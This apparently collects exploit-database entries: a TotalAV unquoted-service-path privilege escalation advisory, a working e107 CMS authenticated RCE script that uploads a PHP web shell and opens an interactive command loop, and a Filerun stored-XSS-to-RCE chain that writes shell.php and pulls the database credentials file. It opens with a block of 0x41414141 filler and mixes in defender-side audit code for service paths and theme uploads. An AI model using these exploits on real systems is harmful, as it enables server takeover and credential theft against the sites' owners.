41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
            
# Exploit Title: TotalAV 5.15.69 - Unquoted Service Path
# Date: 22/09/2021
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://www.totalav.com
# Software Link: https://download.totalav.com/windows/beta-trial or https://install.protected.net/windows/cdn3/5.15.69/TotalAV.exe
# Version: 5.15.69
# Tested on: Windows 10 Pro 20H2 and 21H1 x64

The PC Security Management Service, PC Security Management Monitoring Service, and Anti-Malware SDK Protected Service
services from TotalAV version 5.15.69 are affected by an unquoted service path (CWE-428) vulnerability, which may allow
a user to gain SYSTEM privileges since they all run with higher privileges (SERVICE_START_NAME: LocalSystem). To exploit
the vulnerability it is possible to place executable(s) along the path of the unquoted string.

Affected executables/services: SecurityService, SecurityServiceMonitor, AMSProtectedService:

Display name                               Service name             Binary path                                                               Start
PC Security Management Service             SecurityService          C:\Program Files (x86)\TotalAV\SecurityService.exe                        Auto
PC Security Management Monitoring Service  SecurityServiceMonitor   C:\Program Files (x86)\TotalAV\SecurityService.exe --monitor              Auto
Anti-Malware SDK Protected Service         AMSProtectedService      C:\Program Files (x86)\TotalAV\savapi\elam_ppl\amsprotectedservice.exe    Auto

C:\Users\user>sc qc SecurityService
[SC] QueryServiceConfig OPERAZIONI RIUSCITE

NOME_SERVIZIO: SecurityService
		TIPO 			  : 10  WIN32_OWN_PROCESS
		TIPO_AVVIO 		  : 2   AUTO_START
		CONTROLLO_ERRORE 	  : 1   NORMAL
		NOME_PERCORSO_BINARIO	  : C:\Program Files(x86)\TotalAV\SecurityService.exe
		GRUPPO_ORDINE_CARICAMENTO :
		TAG 			  : 0
		NOME_VISUALIZZATO 	  : PC Security Management Service
		DIPENDENZE		  :
		SERVICE_START_NAME : LocalSystem

C:\Users\user>sc qc SecurityServiceMonitor
[SC] QueryServiceConfig OPERAZIONI RIUSCITE

NOME_SERVIZIO: SecurityServiceMonitor
		TIPO 			  : 10  WIN32_OWN_PROCESS
		TIPO_AVVIO 		  : 2   AUTO_START
		CONTROLLO_ERRORE	  : 1   NORMAL
		NOME_PERCORSO_BINARIO 	  : C:\Program Files(x86)\TotalAV\SecurityService.exe --monitor
		GRUPPO_ORDINE_CARICAMENTO :
		TAG 			  : 0
		NOME_VISUALIZZATO 	  : PC Security Management Monitoring Service
		DIPENDENZE 		  :
		SERVICE_START_NAME : LocalSystem

C:\Users\user>sc qc AMSProtectedService
[SC] QueryServiceConfig OPERAZIONI RIUSCITE

NOME_SERVIZIO: AMSProtectedService
		TIPO 			  : 10  WIN32_OWN_PROCESS
		TIPO_AVVIO 		  : 2   AUTO_START
		CONTROLLO_ERRORE	  : 1   NORMAL
		NOME_PERCORSO_BINARIO 	  : C:\Program Files (x86)\TotalAV\savapi\elam_ppl\amsprotectedservice.exe
		GRUPPO_ORDINE_CARICAMENTO :
		TAG 			  : 0
		NOME_VISUALIZZATO 	  : Anti-Malware SDK Protected Service
		DIPENDENZE 		  :
		SERVICE_START_NAME : LocalSystem
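An added defender-side check, not part of the advisory: it parses `sc qc` output like the listings above (English and Italian key names), flags every service whose image path is unquoted and contains spaces, lists the parent locations whose ACLs must be verified, and produces the quoted image path that fixes it. The sample output is constructed from the listings above; the locale key-name mapping covers only those two locales and is an assumption.

```python
import re

# Constructed sample: the `sc qc` output quoted in the advisory (Italian-locale
# key names), plus one correctly quoted service added for contrast.
SAMPLE_SC_OUTPUT = r"""
NOME_SERVIZIO: SecurityService
        TIPO                      : 10  WIN32_OWN_PROCESS
        TIPO_AVVIO                : 2   AUTO_START
        NOME_PERCORSO_BINARIO     : C:\Program Files(x86)\TotalAV\SecurityService.exe
        SERVICE_START_NAME : LocalSystem

NOME_SERVIZIO: SecurityServiceMonitor
        NOME_PERCORSO_BINARIO     : C:\Program Files(x86)\TotalAV\SecurityService.exe --monitor
        SERVICE_START_NAME : LocalSystem

NOME_SERVIZIO: AMSProtectedService
        NOME_PERCORSO_BINARIO     : C:\Program Files (x86)\TotalAV\savapi\elam_ppl\amsprotectedservice.exe
        SERVICE_START_NAME : LocalSystem

SERVICE_NAME: QuotedExample
        BINARY_PATH_NAME   : "C:\Program Files\Example\svc.exe" --flag
        SERVICE_START_NAME : LocalSystem
"""

# `sc qc` prints localized key names; assumption: only English and Italian are mapped here.
SERVICE_KEYS = {"SERVICE_NAME", "NOME_SERVIZIO"}
PATH_KEYS = {"BINARY_PATH_NAME", "NOME_PERCORSO_BINARIO"}
ACCOUNT_KEYS = {"SERVICE_START_NAME"}

# Executable part of an image path: everything up to the first ".exe" that is
# followed by whitespace or end of line; anything after it is arguments.
EXE_RE = re.compile(r"^(.*?\.exe)(?:\s|$)", re.IGNORECASE)


def parse_sc_qc(text):
    """Turn one or more concatenated `sc qc` outputs into
    {service_name: {"path": image_path, "account": start_name}}."""
    services = {}
    current = None
    for raw in text.splitlines():
        key, sep, value = raw.strip().partition(":")
        if not sep:
            continue
        key, value = key.strip(), value.strip()
        if key in SERVICE_KEYS:
            current = value
            services[current] = {"path": "", "account": ""}
        elif current and key in PATH_KEYS:
            services[current]["path"] = value
        elif current and key in ACCOUNT_KEYS:
            services[current]["account"] = value
    return services


def executable_path(image_path):
    """Strip command-line arguments from an unquoted image path."""
    match = EXE_RE.match(image_path)
    return match.group(1) if match else image_path


def is_unquoted_with_spaces(image_path):
    """CWE-428 condition: the path is not wrapped in quotes and the
    executable's own path contains at least one space."""
    if not image_path or image_path.startswith('"'):
        return False
    return " " in executable_path(image_path)


def search_candidates(exe_path):
    """Locations the service control manager tries, in order, for an unquoted
    path with spaces: each prefix that ends before a space gets ".exe"
    appended. An admin must verify that none of these parent directories is
    writable by unprivileged users."""
    parts = exe_path.split(" ")
    candidates = []
    for i in range(1, len(parts)):
        prefix = " ".join(parts[:i])
        candidates.append(prefix if prefix.lower().endswith(".exe") else prefix + ".exe")
    candidates.append(exe_path)
    return candidates


def audit_services(sc_output):
    """Report every service whose image path is unquoted and contains spaces,
    together with the quoted image path that fixes it (the value to set via
    `sc config <name> binPath=`)."""
    findings = []
    for name, info in parse_sc_qc(sc_output).items():
        path = info["path"]
        if not is_unquoted_with_spaces(path):
            continue
        exe = executable_path(path)
        args = path[len(exe):].strip()
        quoted = f'"{exe}"' + (f" {args}" if args else "")
        findings.append({
            "service": name,
            "account": info["account"],
            "check_write_acl_on": search_candidates(exe),
            "quoted_image_path": quoted,
        })
    return findings


if __name__ == "__main__":
    for finding in audit_services(SAMPLE_SC_OUTPUT):
        print(finding["service"], "runs as", finding["account"])
        print("  verify ACLs on:", finding["check_write_acl_on"])
        print("  set binPath= to:", finding["quoted_image_path"])
```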
            
# Exploit Title: e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 21-09-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://e107.org/
# Software Link: https://e107.org/download
# Version: 2.3.0
# Category: Webapps
# Tested on: Linux/Windows

# e107 is a free website content management system.
# It includes an endpoint that allows remote access.
# The theme page is misconfigured, causing a security vulnerability.
# A user account with sufficient permissions is required.
# The contents of the uploaded "malicious.zip" file must be too long to read, to bypass some security measures!

# Example: python3 exploit.py -u http://example.com -l admin -p Admin123
#		   python3 exploit.py -h


from time import sleep
import requests
import argparse


def main():
	parser = argparse.ArgumentParser(
		description='e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)'
	)
	parser.add_argument('-u', '--host', type=str, required=True)
	parser.add_argument('-l', '--login', type=str, required=True)
	parser.add_argument('-p', '--password', type=str, required=True)
	args = parser.parse_args()
	print("\ne107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)",
		  "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
	host(args)



def host(args):
	# Normalise the target: add a scheme if missing, drop a trailing slash
	if args.host.startswith(('http://', 'https://')):
		print("[?] Check Url...\n")
	else:
		print("\n[?] Check Address...\n")
		args.host = "http://" + args.host
	sleep(2)
	args.host = args.host.rstrip('/')

	# Check Host Status
	try:
		response = requests.get(args.host)
		if response.status_code != 200:
			print("[-] Address not reachable!")
			sleep(2)
			exit(1)
		else:
			check(args)

	except requests.ConnectionError:
		print("[-] Address not reachable!")
		sleep(2)
		exit(1)



def check(args):
	response = requests.get(args.host + "/e107_themes/payload/payload.php?cmd=whoami")
	if response.status_code == 200:
		print("[*] Exploit File Exists!\n")
		sleep(2)
		exploit(args)
	else:
		login(args)



def login(args):
	url = args.host + "/e107_admin/admin.php"
	headers = {
		"Cache-Control": "max-age=0",
		"Upgrade-Insecure-Requests": "1",
		"Origin": args.host,
		"Content-Type": "application/x-www-form-urlencoded",
		"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
		"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
		"Referer": args.host + "/e107_admin/admin.php",
		"Accept-Encoding": "gzip, deflate",
		"Accept-Language": "en-US,en;q=0.9",
		"Connection": "close"
	}
	data = {"authname": args.login, "authpass": args.password, "authsubmit": "Log In"}
	response = requests.post(url, headers=headers, data=data, allow_redirects=False)
	new_cookie = response.cookies.get("MySi_cookieSID")
	if (response.headers.get("Location") == "admin.php?failed"):
		print("[-] Login Failed...\n")
		print("Your username or password is incorrect.")
		sleep(2)
		exit(1)
	else:
		print("[+] Success Login...\n")
		sleep(2)
		install(args, new_cookie)



def install(args, new_cookie):
	url = args.host + "/e107_admin/theme.php"
	cookies = {
		"MySi_cookieSID": new_cookie,
		"e107_tzOffset": "-180"}
	headers = {
		"Cache-Control": "max-age=0",
		"Upgrade-Insecure-Requests": "1",
		"Origin": args.host,
		"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary",
		"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
		"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
		"Referer": args.host + "/e107_admin/theme.php?mode=main&action=upload",
		"Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9",
		"Connection": "close"
	}
	data = "------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n2097152\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"ac\"\r\n\r\n005cd2159fa5342883b18a46726a908d\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"file_userfile[]\"; filename=\"payload.zip\"\r\nContent-Type: application/zip\r\n\r\nPK\x03\x04\x14\x03\x00\x00\x00\x00\xf9|5S\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00payload/PK\x03\x04\x14\x03\x00\x00\x08\x00\xc2\x845S\xb1\xa6\xeeb>\x00\x00\x00M\x00\x00\x00\x13\x00\x00\x00payload/payload.php\xb3\xb1/\xc8(P\xc8L\xd3\xc8,.N-\xd1P\x89ww\r\x89VO\xceMQ\x8f\xd5\xd4\xacVP\x01\xb2\x14l\x15P\xc5\xad\x15\x8a+\x8bKRs5@\xb2@^Jf\xaa\xb5B\xad\x82\xbd\x1d\x00PK\x01\x02?\x03\x14\x03\x00\x00\x00\x00\xf9|5S\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00$\x00\x00\x00\x00\x00\x00\x00\x10\x80\xedA\x00\x00\x00\x00payload/\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x00\xaf\x9b\xc4\xe5\xae\xd7\x01\x80E4\xc5\xe5\xae\xd7\x01\x00\xaf\x9b\xc4\xe5\xae\xd7\x01PK\x01\x02?\x03\x14\x03\x00\x00\x08\x00\xc2\x845S\xb1\xa6\xeeb>\x00\x00\x00M\x00\x00\x00\x13\x00$\x00\x00\x00\x00\x00\x00\x00 \x80\xa4\x81&\x00\x00\x00payload/payload.php\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x80/\x99\xe6\xed\xae\xd7\x01\x008\xa1x\xee\xae\xd7\x01\x80/\x99\xe6\xed\xae\xd7\x01PK\x05\x06\x00\x00\x00\x00\x02\x00\x02\x00\xbf\x00\x00\x00\x95\x00\x00\x00\x00\x00\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"upload\"\r\n\r\n1\r\n------WebKitFormBoundary--\r\n"
	response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False)

	if (response.status_code == 301):
		print("[!] Unauthorized user!\n\n")
		print("Requires user with add theme permissions.")
		sleep(2)
		exit(1)
	else:
		print("[!] Upload Vuln File!\n")
		sleep(2)
		exploit(args)



def exploit(args):
	print("[+] Exploit Done!\n")
	sleep(2)

	while True:
		cmd = input("$ ")
		url = args.host + "/e107_themes/payload/payload.php?cmd=" + cmd
		headers = {
			"Upgrade-Insecure-Requests": "1",
			"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
		}

		response = requests.post(url, headers=headers, timeout=5)

		if response.text == "":
			print(cmd + ": command not found\n")
		else:
			print(response.text)

if __name__ == '__main__':
	main()
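An added example, not part of the exploit or of e107: a server-side audit a theme uploader could run on the archive before extracting it, rejecting entries like the PoC's payload/payload.php, names that climb out of the extraction directory, symlinks, and archives that inflate past the form's 2097152-byte limit. The sample archives are constructed in memory.

```python
import io
import posixpath
import stat
import zipfile

# Server-side executable extensions a theme archive has no business containing.
EXECUTABLE_SUFFIXES = (".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar", ".phps")
MAX_UNCOMPRESSED = 2097152  # the MAX_FILE_SIZE the upload form above advertises


def build_zip(entries):
    """Construct an in-memory zip from {name: bytes} (constructed sample input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, data in entries.items():
            z.writestr(name, data)
    return buf.getvalue()


def escapes_extraction_dir(name):
    """True for absolute names, drive letters and any '..' that climbs above the root."""
    unixish = name.replace("\\", "/")
    if unixish.startswith("/") or (len(unixish) > 1 and unixish[1] == ":"):
        return True
    normalized = posixpath.normpath(unixish)
    return normalized == ".." or normalized.startswith("../")


def audit_theme_zip(data):
    """Return a list of (entry_name, reason) problems for an uploaded theme
    archive; an empty list means every check passed."""
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return [("<archive>", "not a zip file")]
    problems = []
    total = 0
    with archive:
        for info in archive.infolist():
            name = info.filename
            total += info.file_size  # declared uncompressed size
            if escapes_extraction_dir(name):
                problems.append((name, "path escapes extraction directory"))
            if name.lower().endswith(EXECUTABLE_SUFFIXES):
                problems.append((name, "server-side executable file"))
            # Unix mode lives in the upper 16 bits of external_attr
            if stat.S_ISLNK(info.external_attr >> 16):
                problems.append((name, "symbolic link"))
    if total > MAX_UNCOMPRESSED:
        problems.append(("<archive>", f"uncompressed size {total} exceeds {MAX_UNCOMPRESSED}"))
    return problems


# Constructed samples: a plausible theme, and an archive shaped like the PoC's
# payload.zip (a directory holding only a PHP file; the body is a stand-in).
BENIGN_THEME = build_zip({
    "mytheme/": b"",
    "mytheme/theme.xml": b"<e107Theme name='mytheme'/>",
    "mytheme/style.css": b"body { margin: 0 }",
})
MALICIOUS_THEME = build_zip({
    "payload/": b"",
    "payload/payload.php": b"<?php /* constructed stand-in for the PoC's command runner */ ?>",
})
TRAVERSAL_THEME = build_zip({"../../e107_admin/evil.php": b"<?php ?>"})

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_THEME), ("malicious", MALICIOUS_THEME), ("traversal", TRAVERSAL_THEME)):
        print(label, audit_theme_zip(blob) or "OK")
```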
            
# Exploit Title: Filerun 2021.03.26 - Remote Code Execution (RCE) (Authenticated)
# Date: 09/21/2021
# Exploit Author: syntegris information solutions GmbH
# Credits: Christian P.
# Vendor Homepage: https://filerun.com
# Software Link: https://f.afian.se/wl/?id=SkPwYC8dOcMIDWohmyjOqAgdqhRqCZ3X&fmode=download&recipient=d3d3LmZpbGVydW4uY29t
# Version: 2021.03.26
# Tested on: official docker image


# PoC for exploiting a chain of a stored XSS and authenticated Remote Code Execution
import requests
import time
import sys

# this is the plain version of the payload below
"""
var xmlhttp = new XMLHttpRequest();
var url = '/?module=cpanel&section=settings&page=image_preview&action=checkImageMagick'
var payload = "echo '<?php echo shell_exec($_REQUEST[\'cmd\']); ?>'  > shell.php #";
xmlhttp.onreadystatechange = function() {
	if (xmlhttp.readyState == XMLHttpRequest.DONE) {
	   if (xmlhttp.status == 200) {
		   console.log(xmlhttp.responseText);
	   }
	}
};
xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.send("mode=exec&path=convert|"+payload);
"""

if not len(sys.argv) == 2:
	print("missing target url")
	sys.exit(1)

target = sys.argv[1]


def inject_code():
	# The JavaScript above, HTML-entity encoded so it is stored verbatim in the
	# log and only decoded when the admin panel renders the entry.
	payload = (
		'&#x76;&#x61;&#x72;&#x20;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x20;&#x3d;&#x20;&#x6e;&#x65;&#x77;&#x20;&#x58;&#x4d;&#x4c;&#x48;&#x74;&#x74;&#x70;&#x52;&#x65;&#x71;&#x75;&#x65;&#x73;&#x74;&#x28;&#x29;&#x3b;&#x0a;&#x76;&#x61;&#x72;&#x20;&#x75;&#x72;&#x6c;&#x20;&#x3d;&#x20;&#x27;&#x2f;&#x3f;&#x6d;&#x6f;&#x64;&#x75;&#x6c;&#x65;&#x3d;&#x63;&#x70;&#x61;&#x6e;&#x65;&#x6c;&&#x73;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x3d;&#x73;&#x65;&#x74;&#x74;&#x69;&#x6e;&#x67;&#x73;&&#x70;&#x61;&#x67;&#x65;&#x3d;&#x69;&#x6d;&#x61;&#x67;&#x65;&#x5f;&#x70;&#x72;&#x65;&#x76;&#x69;&#x65;&#x77;&&#x61;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x3d;&#x63;&#x68;&#x65;&#x63;&#x6b;&#x49;&#x6d;&#x61;&#x67;&#x65;&#x4d;&#x61;&#x67;&#x69;&#x63;&#x6b;&#x27;&#x0a;&#x76;&#x61;&#x72;&#x20;&#x70;&#x61;&#x79;&#x6c;&#x6f;&#x61;&#x64;&#x20;&#x3d;&#x20;"&#x65;&#x63;&#x68;&#x6f;&#x20;&#x27;<&#x3f;&#x70;&#x68;&#x70;&#x20;&#x65;&#x63;&#x68;&#x6f;&#x20;&#x73;&#x68;&#x65;&#x6c;&#x6c;&#x5f;&#x65;&#x78;&#x65;&#x63;&#x28;&#x24;&#x5f;&#x52;&#x45;&#x51;&#x55;&#x45;&#x53;&#x54;&#x5b;&#x5c;&#x27;&#x63;&#x6d;&#x64;&#x5c;&#x27;&#x5d;&#x29;&#x3b;&#x20;&#x3f;>&#x27;&#x20;&#x20;>&#x20;&#x73;&#x68;&#x65;&#x6c;&#x6c;&#x2e;&#x70;&#x68;&#x70;&#x20;&#x23;"&#x3b;&#x0a;&#x0a;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x6f;&#x6e;&#x72;&#x65;&#x61;&#x64;&#x79;&#x73;&#x74;&#x61;&#x74;&#x65;&#x63;&#x68;&#x61;&#x6e;&#x67;&#x65;&#x20;&#x3d;&#x20;&#x66;&#x75;&#x6e;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x28;&#x29;&#x20;&#x7b;&#x0a;&#x09;&#x69;&#x66;&#x20;&#x28;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x72;&#x65;&#x61;&#x64;&#x79;&#x53;&#x74;&#x61;&#x74;&#x65;&#x20;&#x3d;&#x3d;&#x20;&#x58;&#x4d;&#x4c;&#x48;&#x74;&#x74;&#x70;&#x52;&#x65;&#x71;&#x75;&#x65;&#x73;&#x74;&#x2e;&#x44;&#x4f;&#x4e;&#x45;&#x29;&#x20;&#x7b;&#x0a;&#x09;&#x20;&#x20;&#x20;&#x69;&#x66;&#x20;&#x28;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x73;&#x74;&#x61;&#x74;&#x75;&#x73;&#x20;&#x3d;&#x3d;&#x20;&#x32;&#x30;&#x30;&#x29;&#x20;&#x7b;&#x0a;&#x09;&#x09;&#x20;'
		'&#x20;&#x20;&#x63;&#x6f;&#x6e;&#x73;&#x6f;&#x6c;&#x65;&#x2e;&#x6c;&#x6f;&#x67;&#x28;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x72;&#x65;&#x73;&#x70;&#x6f;&#x6e;&#x73;&#x65;&#x54;&#x65;&#x78;&#x74;&#x29;&#x3b;&#x0a;&#x09;&#x20;&#x20;&#x20;&#x7d;&#x0a;&#x09;&#x20;&#x20;&#x20;&#x65;&#x6c;&#x73;&#x65;&#x20;&#x69;&#x66;&#x20;&#x28;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x73;&#x74;&#x61;&#x74;&#x75;&#x73;&#x20;&#x3d;&#x3d;&#x20;&#x34;&#x30;&#x30;&#x29;&#x20;&#x7b;&#x0a;&#x09;&#x09;&#x20;&#x20;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;&#x54;&#x68;&#x65;&#x72;&#x65;&#x20;&#x77;&#x61;&#x73;&#x20;&#x61;&#x6e;&#x20;&#x65;&#x72;&#x72;&#x6f;&#x72;&#x20;&#x34;&#x30;&#x30;&#x27;&#x29;&#x3b;&#x0a;&#x09;&#x20;&#x20;&#x20;&#x7d;&#x0a;&#x09;&#x20;&#x20;&#x20;&#x65;&#x6c;&#x73;&#x65;&#x20;&#x7b;&#x0a;&#x09;&#x09;&#x20;&#x20;&#x20;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;&#x73;&#x6f;&#x6d;&#x65;&#x74;&#x68;&#x69;&#x6e;&#x67;&#x20;&#x65;&#x6c;&#x73;&#x65;&#x20;&#x6f;&#x74;&#x68;&#x65;&#x72;&#x20;&#x74;&#x68;&#x61;&#x6e;&#x20;&#x32;&#x30;&#x30;&#x20;&#x77;&#x61;&#x73;&#x20;&#x72;&#x65;&#x74;&#x75;&#x72;&#x6e;&#x65;&#x64;&#x27;&#x29;&#x3b;&#x0a;&#x09;&#x20;&#x20;&#x20;&#x7d;&#x0a;&#x09;&#x7d;&#x0a;&#x7d;&#x3b;&#x0a;&#x0a;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x6f;&#x70;&#x65;&#x6e;&#x28;"&#x50;&#x4f;&#x53;&#x54;"&#x2c;&#x20;&#x75;&#x72;&#x6c;&#x2c;&#x20;&#x74;&#x72;&#x75;&#x65;&#x29;&#x3b;&#x0a;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x73;&#x65;&#x74;&#x52;&#x65;&#x71;&#x75;&#x65;&#x73;&#x74;&#x48;&#x65;&#x61;&#x64;&#x65;&#x72;&#x28;"&#x43;&#x6f;&#x6e;&#x74;&#x65;&#x6e;&#x74;&#x2d;&#x54;&#x79;&#x70;&#x65;"&#x2c;&#x20;"&#x61;&#x70;&#x70;&#x6c;&#x69;&#x63;&#x61;&#x74;&#x69;&#x6f;&#x6e;&#x2f;&#x78;&#x2d;&#x77;&#x77;&#x77;&#x2d;&#x66;&#x6f;&#x72;&#x6d;&#x2d;&#x75;&#x72;&#x6c;&#x65;&#x6e;&#x63;&#x6f;&#x64;&#x65;&#x64;"&#x29;&#x3b;&#x0a;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x73;&#x65;&#x6e;&#x64;&#x28;"&#x6d;&#x6f;&#x64;&#x65;&#x3d;&#x65;&#x78;&'
		'#x65;&#x63;&&#x70;&#x61;&#x74;&#x68;&#x3d;&#x63;&#x6f;&#x6e;&#x76;&#x65;&#x72;&#x74;&#x7c;"&#x2b;&#x70;&#x61;&#x79;&#x6c;&#x6f;&#x61;&#x64;&#x29;&#x3b;&#x0a;'
	)
	# A failed login is enough: the X-Forwarded-For value is written to the log
	# unescaped, which is where the stored XSS lands.
	req = requests.post(
		"%s/?module=fileman&page=login&action=login" % target,
		data={'username': 'nonexistend', 'password': 'wrong', 'otp': '',
		'two_step_secret': '', 'language': ''},
		headers={'X-Forwarded-For': '<img src="/asdasdasd" onerror=%s >' % payload}
	)


def check_shell_exists():
	req = requests.get("%s/shell.php" % target)
	if req.status_code != 200:
		return False
	return True

def process_command(command):
	req = requests.get("%s/shell.php?cmd=%s" % (target, command))
	print(req.text)

while True:
	print("Injecting new log message...")
	inject_code()
	time.sleep(10)
	if check_shell_exists():
		print("Shell exists under '%s/shell.php?cmd=ls'" % target)
		break
print("Let's get autoconfig.php which contains database credentials...")
process_command("cp system/data/autoconfig.php js/autoconfig.txt")

ac_resp = requests.get("%s/js/autoconfig.txt" % target)
with open("filerun.autoconfig.php", "wb") as ac_f:
	ac_f.write(ac_resp.content)
# remove the copy that was just fetched, not a file that was never created
process_command("rm js/autoconfig.txt")

while True:
	command = input("Command:")
	process_command(command)
